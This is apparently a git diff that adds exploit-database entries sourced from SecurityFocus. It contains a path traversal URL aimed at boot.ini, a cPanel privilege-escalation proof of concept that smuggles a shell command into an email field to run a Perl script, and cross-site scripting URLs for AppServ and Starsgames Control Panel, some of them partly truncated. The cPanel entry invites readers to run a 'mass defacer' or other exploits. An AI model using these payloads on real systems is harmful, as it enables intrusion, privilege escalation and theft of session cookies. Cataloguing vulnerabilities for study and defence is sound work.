+
+http://www.example.com/bcoos/class/debug/highlight.php?file=../../../../../boot.ini
\ No newline at end of file
diff --git a/platforms/php/webapps/31807.txt b/platforms/php/webapps/31807.txt
new file mode 100755
index 000000000..8a8177e80
--- /dev/null
+++ b/platforms/php/webapps/31807.txt
@@ -0,0 +1,30 @@
+source: http://www.securityfocus.com/bid/29277/info
+
+cPanel is prone to a remote privilege-escalation vulnerability because of an unspecified error.
+
+Successfully exploiting this issue allows remote attackers to gain administrative privileges to the affected application and execute malicious PHP code in the context of the webserver process. This may facilitate a compromise of the webserver and the underlying system; other attacks are also possible.
+
+Test it:
+++++++++++++++++++++++++++
+Step 1
+
+Save this file in /home/user/public_html/do.pl .
+#!/usr/bin/perl
+$old='/home/user/public_html/test.txt';
+$new='/home/root/kon.txt';
+rename $old, $new;
+++++++++++++++++++++++++++
+step 2
+
+make a text file named test.txt in your public_html directory.
+path will be : /home/user/public_html/test.txt .
+++++++++++++++++++++++++++
+step 3
+
+create an account and write ali@hackerz.ir;./home/user/public_html/do.pl in E-mail Address text box
+then click on the "create" button.
+Yes , you can find your file in /home/root/ .
+++++++++++++++++++++++++++
+()()()()()()()()()()()()()
+you can run your own code !(mass defacer, exploit's or everything that u want).
+Enjoy it...
diff --git a/platforms/php/webapps/31808.txt b/platforms/php/webapps/31808.txt
new file mode 100755
index 000000000..d667a011b
--- /dev/null
+++ b/platforms/php/webapps/31808.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29291/info
+
+AppServ Open Project is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+AppServ Open Project 2.5.10 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?appservlang=">[XSS] http://www.example.com/index.php?appservlang="> http://www.example.com/index.php?appservlang="> http://www.example.com/index.php?appservlang="> http://www.example.com/index.php?appservlang="> http://www.example.com/index.php?appservlang="> http://www.example.com/index.php?appservlang="> Submit
\ No newline at end of file
diff --git a/platforms/php/webapps/31809.txt b/platforms/php/webapps/31809.txt
new file mode 100755
index 000000000..69beab429
--- /dev/null
+++ b/platforms/php/webapps/31809.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/29295/info
+
+Starsgames Control Panel is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+Starsgames Control Panel 4.6.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/index.php?showtopic=18&st=</textarea> http://www.example.com/index.php?showtopic=18&st=</textarea>
